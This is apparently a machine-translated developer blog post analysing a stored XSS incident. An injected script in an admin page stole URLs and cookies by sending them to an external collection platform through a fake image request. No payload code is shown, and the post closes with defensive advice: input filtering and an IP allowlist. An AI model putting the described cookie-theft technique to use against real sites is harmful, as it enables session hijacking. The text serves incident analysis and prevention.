Subject: Business people suddenly feedback background data display is not normal, so look for technical reasons.
1. troubleshoot
When I was troubleshooting the problem and found that when the user is submitted, there is no back-end XSS filtering the content, resulting in a database into a script, the script contains the contents returned to the fore, when drawing a page, because the script tag not closed, resulting in a break of painting, so the page is not displayed correctly.
Stored in the database like this
2. Analysis
Just for XSS very interested, take a look at, into a js script, in the end is how to carry out malicious attacks.
Prepare a local web project to test the contents of the login page plus figure, observing the browser NetWork
Figure above, there are three exception request
Exception request 1
The first OrAI request is forwarded 301, because I was local http, its website is https, the request of its resources, had to be https, it will be 301 to https
Malformed request 2
The second OrAI request, returns a js script
This js is very simple, is to get the url and cookie, then disguised request picture, after "pictures" link to bring parameters, send to each other. With the url and cookie, then the other side can do whatever they want into the background
Malformed request 3
The third request is that we send data to each other, and very intuitive
As can be seen from the network the request sent to a data xss platform
3. Question treatment and prevention
For all the back-end of the received parameters, you have to do XSS and SQL filtering. Storage of data has to be corrected
However, I think the data added, has been a long time, it stands to reason that he should have the withdrawals, and ye have not heard the information security issues related to it? Only later did react, we have to do the background is limited ip, ip only be opened in the white list, so to some extent, to avoid the bad faith of withdrawals
